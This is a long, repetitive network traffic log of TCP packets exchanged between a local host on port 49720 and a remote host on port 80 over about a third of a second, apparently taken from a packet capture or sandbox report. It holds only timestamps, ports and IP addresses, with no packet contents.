                                                                                                                                                                                          Dec 18, 2024 09:07:30.669537067 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.671441078 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.671583891 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.671631098 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.673487902 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.673532963 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.673573971 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.675498962 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.675582886 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.675627947 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.677512884 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.677593946 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.677632093 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.677663088 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.679548979 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.679596901 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.679637909 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.679675102 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.681574106 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.681731939 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.681778908 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.683613062 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.683660030 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.683706999 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.683746099 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.685656071 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.685703039 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.685712099 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.685740948 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.687681913 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.687745094 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.687767982 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.687958956 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.689685106 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.689765930 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.689820051 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.691714048 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.691792011 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.691838026 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.693764925 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.693831921 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.693876982 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.693918943 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.695734024 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.695832968 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.695880890 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.697801113 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.697874069 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.697889090 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.697906971 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.699779987 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.699831963 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.699873924 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.700134039 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.701843023 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.701891899 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.701911926 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.701947927 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.703857899 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.703901052 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.703924894 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.703998089 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.787962914 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.788050890 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.788089037 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.788142920 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.788727999 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.788784981 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.788901091 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.788939953 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.790261030 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.790319920 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.790380955 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.790420055 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.791743040 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.791834116 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.791897058 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.793354034 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.793406010 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.793473005 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.794877052 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.794919014 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.794975996 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.796426058 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.796506882 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.796557903 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.797959089 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.798012972 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.798059940 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.799412966 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.799473047 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.799489975 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.799532890 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.800863981 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.800930977 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.800971985 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.802437067 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.802496910 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.802582026 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.802817106 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.803754091 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.803869963 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.803875923 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.805275917 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.805330992 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.805341959 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.805372953 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.806612968 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.806696892 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.806747913 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.808008909 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.808233023 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.808293104 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.809401989 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.809515953 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.809572935 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.810894966 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.810933113 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.810990095 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.812279940 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.812310934 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.812354088 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.813525915 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.813613892 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.813657045 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.815118074 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.815131903 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.815177917 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.816236019 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.816317081 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.816354036 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.817528963 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.817847013 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.817893028 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.821552992 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.821566105 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.821587086 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.821607113 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.821624994 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.821832895 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.822312117 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.822354078 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.822489977 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.823488951 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.824261904 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.824434996 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.824472904 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.825479031 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.825505018 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.825524092 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.825555086 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.826668978 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.826719999 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.826823950 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.826864958 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.827971935 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.828116894 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.828166008 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.829327106 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.829344034 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.829391003 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.830557108 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.830596924 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.830744028 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.831474066 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.831871986 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.831885099 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.831913948 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.831933975 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.833061934 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.833239079 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.833277941 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.834295034 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.834445953 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.834491014 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.835366964 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.835421085 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.835585117 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.836455107 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.836972952 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.836988926 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.837027073 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.838217974 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.838232040 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.838270903 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.839350939 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.839479923 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.839487076 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.839519024 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.840737104 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.840882063 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.840923071 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.841897964 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.842048883 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.842091084 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.843170881 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.843337059 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.843377113 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.844557047 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.844572067 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.844614029 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.845668077 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.845724106 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.845963001 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.846143961 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.847043037 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.847192049 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.847230911 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.848283052 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.848334074 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.848433971 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.848476887 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.849530935 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.849708080 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.849754095 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.850986958 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.851006985 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.851032019 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.851042986 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.852016926 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.852086067 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.852148056 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.852190971 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.853436947 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.853452921 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.853486061 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.853497982 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.854603052 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.854628086 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.854662895 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.855845928 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.855890036 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.856009007 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.856050014 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.857150078 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.857198954 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.857286930 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.857326984 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.858485937 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.858514071 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.858522892 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.858540058 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.858582973 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.979621887 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.979684114 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.979934931 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.979947090 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.979989052 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.980125904 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.980372906 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.980864048 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.980900049 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.981391907 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.981436968 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.981951952 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.981964111 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.982016087 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.983359098 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.983370066 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.983413935 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.984100103 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.984110117 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.984138966 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.984184980 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.984965086 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.984999895 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.985305071 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.985341072 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.987586021 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.987601042 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.987670898 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.987670898 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.988450050 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.988461018 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.988490105 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.988511086 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.989137888 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.989180088 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.989317894 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.989355087 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.990140915 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.990180016 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.990331888 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.990367889 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.991265059 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.991285086 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.991308928 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.991336107 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.992163897 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.992325068 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.992367983 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.993175983 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.993356943 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.993400097 CET4972080192.168.2.831.41.244.11
